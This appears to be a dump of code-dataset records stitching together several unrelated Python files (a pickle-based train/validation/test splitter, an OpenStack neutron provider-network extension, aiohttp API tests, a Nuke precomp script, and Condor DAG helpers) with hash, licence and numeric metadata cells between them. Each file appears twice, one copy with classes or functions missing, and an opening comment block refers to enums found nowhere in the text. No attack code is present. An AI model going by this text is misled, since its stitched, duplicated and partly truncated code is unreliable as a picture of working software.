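# Tiny usage illustration (added; kept as comments since this generated module should not
# be edited by hand): these are str-mixin enums, so members compare equal to the literal
# strings the service expects and can be looked up by value.
# assert IntegrationConnectorType.S3 == "S3"
# assert IntegrationTriggerType.ON_DEMAND.value == "OnDemand"
# assert ObjectTypeKeyStandardIdentifiersItem("PROFILE") is ObjectTypeKeyStandardIdentifiersItem.PROFILE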
| 0
| 0
| 0
| 4,820
| 0
| 0
| 0
| 0
| 299
|
2d12ec7f50c3d061e4b79a9ffffcc034bd787b1d
| 2,104
|
py
|
Python
|
Dataset/split_data.py
|
atmacvit/meronymnet
|
47e1a7caadc0f770439bb26a93b885f790f62804
|
[
"MIT"
] | 1
|
2021-11-02T05:13:12.000Z
|
2021-11-02T05:13:12.000Z
|
Dataset/split_data.py
|
atmacvit/meronymnet
|
47e1a7caadc0f770439bb26a93b885f790f62804
|
[
"MIT"
] | 1
|
2021-12-17T14:29:18.000Z
|
2021-12-17T14:29:18.000Z
|
Dataset/split_data.py
|
atmacvit/meronymnet
|
47e1a7caadc0f770439bb26a93b885f790f62804
|
[
"MIT"
] | null | null | null |
import pickle
objects = ['cow', 'dog', 'person', 'horse', 'sheep', 'aeroplane', 'bird', 'bicycle', 'cat', 'motorbike', 'car']
for object_name in objects:
with open(object_name + '_part_separated_labels', 'rb') as f:
label = pickle.load(f)
with open(object_name + '_part_separated_bbx', 'rb') as f:
box = pickle.load(f)
with open(object_name + '_part_separated_masks', 'rb') as f:
mask = pickle.load(f)
with open(object_name + '_images', 'rb') as f:
o_images = pickle.load(f)
size = len(label)
train_split = int((75/100)*size)
validation_split = int((10/100)*size)
test_split = int((15/100)*size)
#train
with open(object_name+'_train_label', 'wb') as f:
pickle.dump(label[0:train_split], f)
with open(object_name+'_train_bbx', 'wb') as f:
pickle.dump(box[0:train_split], f)
with open(object_name+'_train_masks', 'wb') as f:
pickle.dump(mask[0:train_split], f)
with open(object_name+'_train_images', 'wb') as f:
pickle.dump(o_images[0:train_split], f)
    #validation
with open(object_name+'_validation_label', 'wb') as f:
pickle.dump(label[train_split:train_split+validation_split], f)
with open(object_name+'_validation_bbx', 'wb') as f:
pickle.dump(box[train_split:train_split+validation_split], f)
with open(object_name+'_validation_masks', 'wb') as f:
pickle.dump(mask[train_split:train_split+validation_split], f)
with open(object_name+'_validation_images', 'wb') as f:
pickle.dump(o_images[train_split:train_split+validation_split], f)
#test
with open(object_name+'_test_label', 'wb') as f:
pickle.dump(label[train_split+validation_split::], f)
with open(object_name+'_test_bbx', 'wb') as f:
pickle.dump(box[train_split+validation_split::], f)
with open(object_name+'_test_masks', 'wb') as f:
pickle.dump(mask[train_split+validation_split::], f)
with open(object_name+'_test_images', 'wb') as f:
pickle.dump(o_images[train_split+validation_split::], f)
| 41.254902
| 112
| 0.661122
|
import numpy as np
import pickle
objects = ['cow', 'dog', 'person', 'horse', 'sheep', 'aeroplane', 'bird', 'bicycle', 'cat', 'motorbike', 'car']
for object_name in objects:
with open(object_name + '_part_separated_labels', 'rb') as f:
label = pickle.load(f)
with open(object_name + '_part_separated_bbx', 'rb') as f:
box = pickle.load(f)
with open(object_name + '_part_separated_masks', 'rb') as f:
mask = pickle.load(f)
with open(object_name + '_images', 'rb') as f:
o_images = pickle.load(f)
size = len(label)
train_split = int((75/100)*size)
validation_split = int((10/100)*size)
test_split = int((15/100)*size)
#train
with open(object_name+'_train_label', 'wb') as f:
pickle.dump(label[0:train_split], f)
with open(object_name+'_train_bbx', 'wb') as f:
pickle.dump(box[0:train_split], f)
with open(object_name+'_train_masks', 'wb') as f:
pickle.dump(mask[0:train_split], f)
with open(object_name+'_train_images', 'wb') as f:
pickle.dump(o_images[0:train_split], f)
    #validation
with open(object_name+'_validation_label', 'wb') as f:
pickle.dump(label[train_split:train_split+validation_split], f)
with open(object_name+'_validation_bbx', 'wb') as f:
pickle.dump(box[train_split:train_split+validation_split], f)
with open(object_name+'_validation_masks', 'wb') as f:
pickle.dump(mask[train_split:train_split+validation_split], f)
with open(object_name+'_validation_images', 'wb') as f:
pickle.dump(o_images[train_split:train_split+validation_split], f)
#test
with open(object_name+'_test_label', 'wb') as f:
pickle.dump(label[train_split+validation_split::], f)
with open(object_name+'_test_bbx', 'wb') as f:
pickle.dump(box[train_split+validation_split::], f)
with open(object_name+'_test_masks', 'wb') as f:
pickle.dump(mask[train_split+validation_split::], f)
with open(object_name+'_test_images', 'wb') as f:
pickle.dump(o_images[train_split+validation_split::], f)
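# Worked example of the split arithmetic above (added for illustration): for a hypothetical
# class with 1000 samples, int() truncates and the open-ended test slice absorbs any
# rounding remainder.
example_size = 1000
example_train = int((75/100) * example_size)               # 750 -> indices [0:750]
example_val = int((10/100) * example_size)                 # 100 -> indices [750:850]
example_test = example_size - example_train - example_val  # 150 -> indices [850:]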
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| -3
| 22
|
ae765890a283e1cafc55cfc222fa3eddff1f2a46
| 2,302
|
py
|
Python
|
neutron/extensions/providernet.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | 1
|
2019-06-02T06:15:39.000Z
|
2019-06-02T06:15:39.000Z
|
neutron/extensions/providernet.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | null | null | null |
neutron/extensions/providernet.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2012 OpenStack Foundation.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import provider_net
from neutron_lib.api import validators
from neutron_lib import exceptions as n_exc
from neutron._i18n import _
def _raise_if_updates_provider_attributes(attrs):
"""Raise exception if provider attributes are present.
This method is used for plugins that do not support
updating provider networks.
"""
if any(validators.is_attr_set(attrs.get(a))
for a in provider_net.ATTRIBUTES):
msg = _("Plugin does not support updating provider attributes")
raise n_exc.InvalidInput(error_message=msg)
| 32.885714
| 78
| 0.728931
|
# Copyright (c) 2012 OpenStack Foundation.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import provider_net
from neutron_lib.api import extensions
from neutron_lib.api import validators
from neutron_lib import exceptions as n_exc
from neutron._i18n import _
def _raise_if_updates_provider_attributes(attrs):
"""Raise exception if provider attributes are present.
This method is used for plugins that do not support
updating provider networks.
"""
if any(validators.is_attr_set(attrs.get(a))
for a in provider_net.ATTRIBUTES):
msg = _("Plugin does not support updating provider attributes")
raise n_exc.InvalidInput(error_message=msg)
class Providernet(extensions.ExtensionDescriptor):
"""Extension class supporting provider networks.
This class is used by neutron's extension framework to make
metadata about the provider network extension available to
clients. No new resources are defined by this extension. Instead,
the existing network resource's request and response messages are
extended with attributes in the provider namespace.
With admin rights, network dictionaries returned will also include
provider attributes.
"""
@classmethod
def get_name(cls):
return provider_net.NAME
@classmethod
def get_alias(cls):
return provider_net.ALIAS
@classmethod
def get_description(cls):
return provider_net.DESCRIPTION
@classmethod
def get_updated(cls):
return provider_net.UPDATED_TIMESTAMP
def get_extended_resources(self, version):
if version == "2.0":
return provider_net.RESOURCE_ATTRIBUTE_MAP
else:
return {}
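# Hedged usage sketch (added, not from the source; requires neutron_lib to be installed):
# a plugin that cannot update provider networks passes the incoming attribute dict to the
# helper above. Any set provider attribute (e.g. 'provider:network_type', taken from
# provider_net.ATTRIBUTES) makes it raise InvalidInput with the message defined here.
#
# attrs = {'name': 'net-1', 'provider:network_type': 'vlan'}
# _raise_if_updates_provider_attributes(attrs)   # raises n_exc.InvalidInput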
| 0
| 220
| 0
| 787
| 0
| 0
| 0
| 17
| 45
|
8d7f3685a45adea2ebce073ffebe24607e61fa6d
| 3,181
|
py
|
Python
|
tests/test_consumer_api.py
|
tysongg/essential-cosmic
|
1bd21b4ed246dfda983c6e49b0967a4a1a289d63
|
[
"MIT"
] | null | null | null |
tests/test_consumer_api.py
|
tysongg/essential-cosmic
|
1bd21b4ed246dfda983c6e49b0967a4a1a289d63
|
[
"MIT"
] | 9
|
2020-01-27T02:08:04.000Z
|
2020-01-27T02:46:53.000Z
|
tests/test_consumer_api.py
|
tysongg/essential-cosmic
|
1bd21b4ed246dfda983c6e49b0967a4a1a289d63
|
[
"MIT"
] | null | null | null |
import os
import sys
# Workaround so we don't have to create a setup.py file for the project and
# install an editable version
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
| 31.186275
| 85
| 0.607042
|
import pytest
import asyncio
import os
import sys
# Workaround so we don't have to create a setup.py file for the project and
# install an editable version
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
from essential_cosmic.app import make_app
class TestConsumer:
@pytest.fixture(scope="function")
async def cli(self, aiohttp_client):
client = await aiohttp_client(make_app())
return client
@pytest.fixture(scope="function")
async def topic(self, cli):
resp = await cli.post("/topic", json={"title": "Test Topic"})
topic = await resp.json()
return topic
@pytest.fixture(scope="function")
async def messages(self, cli, topic):
resps = await asyncio.gather(
*[
cli.post(
"/topic/%s/message" % topic["id"], json={"value": "Test Message"}
)
for _ in range(3)
]
)
messages = await asyncio.gather(*[resp.json() for resp in resps])
return messages
async def test_topic_list(self, cli, topic):
resp = await cli.get("/topic")
assert resp.status == 200
body_json = await resp.json()
assert type(body_json) == list
assert len(body_json) == 1
async def test_topic_detail(self, cli, topic):
resp = await cli.get("/topic/%s" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == topic
async def test_topic_detail_missing(self, cli):
resp = await cli.get("/topic/missing")
assert resp.status == 404
resp_json = await resp.json()
assert resp_json["message"] == "Topic does not exist"
async def test_topic_message_empty(self, cli, topic):
resp = await cli.get("/topic/%s/message" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert type(resp_json) == list
assert len(resp_json) == 0
async def test_topic_message(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages
assert len(resp_json) == 3
async def test_topic_message_offset(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message?offset=1" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages[1:]
assert len(resp_json) == 2
async def test_topic_message_count(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message?count=2" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages[:2]
assert len(resp_json) == 2
async def test_topic_message_offset_and_count(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message?offset=1&count=1" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages[1:2]
assert len(resp_json) == 1
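# Assumed invocation (added, not from the source): these coroutine tests rely on pytest
# with an aiohttp-aware plugin such as pytest-aiohttp, which supplies the aiohttp_client
# fixture used above and collects the async test functions.
#   python -m pytest tests/test_consumer_api.py -q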
| 0
| 690
| 1,905
| -2
| 0
| 0
| 0
| 5
| 386
|
d04c8eff07c31a44f0aef8503a211c69268b39fd
| 8,889
|
py
|
Python
|
nuke_stubs/nukescripts/precomp.py
|
sisoe24/Nuke-Python-Stubs
|
79c53cf5cb7b38e15a34fd04f672b143d9d7dc85
|
[
"MIT"
] | 1
|
2022-01-12T01:29:16.000Z
|
2022-01-12T01:29:16.000Z
|
nuke_stubs/nukescripts/precomp.py
|
sisoe24/Nuke-Python-Stubs
|
79c53cf5cb7b38e15a34fd04f672b143d9d7dc85
|
[
"MIT"
] | null | null | null |
nuke_stubs/nukescripts/precomp.py
|
sisoe24/Nuke-Python-Stubs
|
79c53cf5cb7b38e15a34fd04f672b143d9d7dc85
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2009 The Foundry Visionmongers Ltd. All Rights Reserved.
| 28.399361
| 167
| 0.623242
|
# Copyright (c) 2009 The Foundry Visionmongers Ltd. All Rights Reserved.
import nuke
import os, re, sys, math, time
from nukescripts import execute_panel
from nukescripts import panels
class PrecompOptionsDialog( panels.PythonPanel ):
def __init__( self ):
panels.PythonPanel.__init__( self, "Precomp Nodes", "uk.co.thefoundry.PrecompOptionsDialog" )
self.scriptPath = nuke.File_Knob( "script", "Precomp script path " )
self.renderPath = nuke.File_Knob( "render", "Precomp render path " )
self.channels = nuke.Channel_Knob( "channels", "Channels " )
self.origNodes = nuke.Enumeration_Knob( "orig", "Original nodes ", ["add backdrop", "delete", "no change" ] )
self.addKnob ( self.scriptPath )
self.addKnob ( self.renderPath )
self.addKnob ( self.channels )
self.addKnob ( self.origNodes )
self.channels.setValue('all')
defaultDir = nuke.Root()['name'].value()
if defaultDir and defaultDir != "":
defaultDir = os.path.dirname( defaultDir )
if not defaultDir.endswith("/"):
defaultDir += "/"
else:
defaultDir = ""
basename = findNextName("Precomp")
self.scriptPath.setValue( defaultDir + basename + "_v01.nk" )
self.renderPath.setValue( defaultDir + basename + ".####.exr" )
self.setMinimumSize( 420, 50 )
class PrecompOptions:
def __init__(self):
self.scriptPath = ""
self.renderPath = ""
self.channels = ""
self.addBackdrop = False
self.delete = False
def askUserForOptions(self):
p = PrecompOptionsDialog()
result = p.showModalDialog()
if result:
self.scriptPath = p.scriptPath.value()
self.renderPath = p.renderPath.value()
self.channels = p.channels.value()
if p.origNodes.value() == "delete":
self.delete = True
elif p.origNodes.value() == "add backdrop":
self.addBackdrop = True
if nuke.env['nc']:
nukeExt = ".nknc"
      elif nuke.env['indie']:
nukeExt = ".nkind"
else:
nukeExt = ".nk"
(root, ext) = os.path.splitext(self.scriptPath)
if not ext:
self.scriptPath += nukeExt
elif ext == ".nk" and ext != nukeExt:
self.scriptPath = self.scriptPath[0:-3] + nukeExt
(root,ext) = os.path.splitext(self.renderPath)
if not ext:
self.renderPath += ".exr"
if os.path.exists(self.scriptPath):
if not nuke.ask("Overwrite existing " + self.scriptPath + " ?"):
return False
return True
else:
return False
def precomp_open(precomp):
precomp.executePythonCallback(nuke.PRECOMP_CALLBACK_OPENED)
nuke.Root().setModified( True )
nuke.scriptOpen(precomp["file"].evaluate())
def precomp_render(precomp):
reading = precomp["reading"].getValue()
precomp["reading"].setValue( False )
try:
finalNode = None
if precomp['useOutput'].value() == True:
finalNode = nuke.toNode( precomp['output'].value() )
else:
if precomp.output() and precomp.output().input(0):
finalNode = precomp.output().input(0)
execute_panel( [ finalNode ] )
except RuntimeError as e:
    if str(e)[0:9] != "Cancelled": # TO DO: change this to an exception type
raise
return
precomp["reading"].setValue( True )
def findNextName(name):
i = 1
while nuke.toNode ( name + str(i) ) != None:
i += 1
return name + str(i)
def precomp_copyToGroup(precomp):
## group context is set to precomp, so back up one level.
nuke.endGroup()
g = nuke.nodes.Group()
with precomp:
nuke.selectAll()
nuke.nodeCopy ( '%clipboard%' )
with g:
nuke.nodePaste( '%clipboard%' )
for k in ['label', 'icon', 'indicators', 'tile_color', 'disable']:
v = precomp[k].value()
if v:
g[k].setValue( v )
for k in precomp.allKnobs():
if isinstance( k, nuke.Link_Knob ):
lnk = nuke.Link_Knob( k.name() )
lnk.setLink( k.getLink() )
g.addKnob( lnk )
def precomp_selected():
nodes = nuke.selectedNodes()
if len(nodes) == 0:
g = nuke.createNode( "Precomp" )
return
options = PrecompOptions()
if not options.askUserForOptions():
return False
sel = nodes[0]
## select upstream nodes
if len( nodes ) == 1:
upstreamNodes = nuke.dependencies( nodes )
while len ( upstreamNodes ) != 0:
nodes += upstreamNodes
upstreamNodes = nuke.dependencies( upstreamNodes )
left = right = nodes[0].xpos()
top = bottom = nodes[0].ypos()
nodeSize = 100
titleHeight = 50
inputs = []
for n in nodes:
n["selected"].setValue ( True )
if n.xpos() < left:
left = n.xpos()
if n.xpos() > right:
right = n.xpos()
if n.ypos() < top:
top = n.ypos()
if n.ypos() > bottom:
bottom = n.ypos()
for i in range( 0, n.inputs() ):
if not n.input(i):
continue
if not n.input(i) in nodes:
inputs.append( n.input(i) )
## find all the dependent nodes
inputDeps = []
expressionDeps = []
for n in nodes:
for d in nuke.dependentNodes( nuke.INPUTS, [n]):
if d not in nodes:
if d.Class() != 'Viewer':
inputIndices = [i for i in range(d.inputs()) if d.input(i) == n]
inputDeps.append( (d, inputIndices) )
for d in nuke.dependencies( [n], nuke.EXPRESSIONS ):
if d not in nodes:
expressionDeps.append( d )
if len(inputDeps) > 1:
nuke.message( "You cannot precomp the selected nodes because there are multiple outputs." )
return
addLinkedExpressionNodes = False
if len(expressionDeps) > 0:
addLinkedExpressionNodes = nuke.ask( "Warning: The selected nodes have expressions to nodes outside the precomp. Do you want to copy these nodes to the precomp?" )
## make group and export
if len( nodes ) == 1 and nodes[0].Class() == "Group":
group = nodes[0]
else:
group = nuke.makeGroup( False )
with group:
outputInputs = []
output = group.output()
for i in range(0, output.inputs()):
outputInputs.append( output.input(i) )
## insert write node or use existing one
outInp = output.input(0)
if outInp is None or outInp.Class() != "Write":
w = nuke.createNode( "Write", inpanel = False)
w.setInput( 0, None )
else:
w = outInp
for i in range(0, len(outputInputs) ):
w.setInput( i, outputInputs[i] )
output.setInput(i, None )
output.setInput(0, w )
w.knob("file").setValue( options.renderPath )
type = os.path.splitext( options.renderPath)[1][1:].lower()
w.knob("file_type").setValue( type )
w.knob("channels").setValue( options.channels )
for n in nuke.allNodes():
n['selected'].setValue( False )
if addLinkedExpressionNodes:
for n in nuke.allNodes():
n['selected'].setValue( False )
for n in expressionDeps:
n['selected'].setValue( True )
nuke.nodeCopy ( '%clipboard%' )
with group:
nuke.nodePaste( '%clipboard%' )
writeOk = True
with group:
try:
nuke.tcl("export_as_precomp", options.scriptPath)
except:
nuke.message( "Could not write precomp script, permission denied, please specify a different \'script path\' and try again.")
writeOk = False
for n in nuke.selectedNodes():
n['selected'].setValue( False )
if group != nodes[0]:
group['selected'].setValue( False )
nuke.delete( group )
if not writeOk:
for n in nuke.selectedNodes():
n['selected'].setValue( False )
for n in nodes:
n['selected'].setValue( True )
return
## reload saved out script
g = nuke.createNode( "Precomp" )
g[ "file" ].setValue( options.scriptPath )
#nuke.tprint( "Selected Node: " + sel.name() )
for d in inputDeps:
node = d[0]
for inp in d[1]:
#nuke.tprint ( "Reconnecting dep " + node.name() + " input " + str(inp) )
node.setInput(inp, g)
## reconnect inputs, if any
for i in range(0, len(inputs)):
#nuke.tprint ( "Reconnecting input " + inputs[i].name() + " " + str(i) )
g.setInput(i, inputs[i] )
pad = 5
if options.addBackdrop:
b = nuke.createNode( "BackdropNode", inpanel = False )
width = int(math.fabs(right - left)) + (pad * 2) + nodeSize
height = int(math.fabs(bottom - top)) + ( pad * 2 ) + nodeSize + titleHeight
b['label'].setValue( os.path.basename( options.scriptPath ) )
b['note_font_size'].setValue( 18 )
b.setXYpos( left - pad * 2, top - ( pad * 2) - titleHeight )
b.knob( "bdwidth" ).setValue( width )
b.knob( "bdheight").setValue( height )
b.knob( "z_order" ).setValue( 0 )
b['selected'].setValue(False)
g.setXYpos( b.xpos() + width/2 - nodeSize/2, b.ypos() + height + pad * 2 )
elif options.delete:
for n in nodes:
nuke.delete( n )
if len(inputs) > 0:
nuke.message( "Warning: The precomp script requires inputs and may not render the same independent of its parent script." )
return group
| 0
| 0
| 0
| 2,282
| 0
| 6,260
| 0
| 24
| 249
|
71db7646b48f42a2dbbfeaf06ad12d63c39123bf
| 72,149
|
py
|
Python
|
MonteCarloMarginalizeCode/Code/RIFT/misc/dag_utils.py
|
spfanning/research-projects-RIT
|
34afc69ccb502825c81285733dac8ff993f79503
|
[
"MIT"
] | 8
|
2019-10-23T01:18:44.000Z
|
2021-07-09T18:24:36.000Z
|
MonteCarloMarginalizeCode/Code/RIFT/misc/dag_utils.py
|
spfanning/research-projects-RIT
|
34afc69ccb502825c81285733dac8ff993f79503
|
[
"MIT"
] | 7
|
2020-01-03T14:38:26.000Z
|
2022-01-17T16:57:02.000Z
|
MonteCarloMarginalizeCode/Code/RIFT/misc/dag_utils.py
|
spfanning/research-projects-RIT
|
34afc69ccb502825c81285733dac8ff993f79503
|
[
"MIT"
] | 11
|
2019-10-23T01:19:50.000Z
|
2021-11-20T23:35:39.000Z
|
# Copyright (C) 2013 Evan Ochsner
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
A collection of routines to manage Condor workflows (DAGs).
"""
import os, sys
import numpy as np
from time import time
from hashlib import md5
from glue import pipeline
__author__ = "Evan Ochsner <[email protected]>, Chris Pankow <[email protected]>"
# Taken from
# http://pythonadventures.wordpress.com/2011/03/13/equivalent-of-the-which-command-in-python/
def generate_job_id():
"""
Generate a unique md5 hash for use as a job ID.
Borrowed and modified from the LAL code in glue/glue/pipeline.py
"""
t = str( int( time() * 1000 ) )
r = str( int( np.random.random() * 100000000000000000 ) )
    return md5((t + r).encode()).hexdigest()  # md5 requires bytes under Python 3
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
def write_integrate_likelihood_extrinsic_grid_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Like the other case (below), but modified to use the sim_xml
and loop over 'event'
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'sim' is the path to the XML file with the grid
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("event")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
    # This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each time.
return ile_job, ile_sub_name
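# Illustrative call pattern (added; the keyword names below are assumptions based on the
# generic kwargs handling above, not the real ILE flag list): the sub-writer is typically
# paired with CondorDAGNode objects that fill in the 'event' macro per grid point, e.g.
#   ile_job, ile_sub = write_integrate_likelihood_extrinsic_grid_sub(
#       tag='ILE', log_dir='logs/', ncopies=2,
#       psd_file=['H1=H1-psd.xml.gz', 'L1=L1-psd.xml.gz'],
#       channel_name=['H1=GDS-CALIB_STRAIN', 'L1=GDS-CALIB_STRAIN'],
#       output_file='ILE-output.xml.gz', save_samples=True)
#   node = pipeline.CondorDAGNode(ile_job)
#   node.add_var_opt('event', 0)      # consumed by add_var_opt("event") in the sub file
#   dag.add_node(node)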
# FIXME: Keep in sync with arguments of integrate_likelihood_extrinsic
def write_integrate_likelihood_extrinsic_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'coinc' is the path to a coincident XML file, from which masses and
times will be drawn FIXME: remove this once it's no longer needed.
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("mass1")
ile_job.add_var_opt("mass2")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
return ile_job, ile_sub_name
def write_result_coalescence_sub(tag='coalesce', exe=None, log_dir=None, output_dir="./", use_default_cache=True):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("ligolw_sqlite")
sql_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
sql_sub_name = tag + '.sub'
sql_job.set_sub_file(sql_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
sql_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
sql_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
sql_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if use_default_cache:
sql_job.add_opt("input-cache", "ILE_$(macromassid).cache")
else:
sql_job.add_arg("$(macrofiles)")
#sql_job.add_arg("*$(macromassid)*.xml.gz")
sql_job.add_opt("database", "ILE_$(macromassid).sqlite")
#if os.environ.has_key("TMPDIR"):
#tmpdir = os.environ["TMPDIR"]
#else:
#print >>sys.stderr, "WARNING, TMPDIR environment variable not set. Will default to /tmp/, but this could be dangerous."
#tmpdir = "/tmp/"
tmpdir = "/dev/shm/"
sql_job.add_opt("tmp-space", tmpdir)
sql_job.add_opt("verbose", None)
sql_job.add_condor_cmd('getenv', 'True')
sql_job.add_condor_cmd('request_memory', '1024')
return sql_job, sql_sub_name
def write_posterior_plot_sub(tag='plot_post', exe=None, log_dir=None, output_dir="./"):
"""
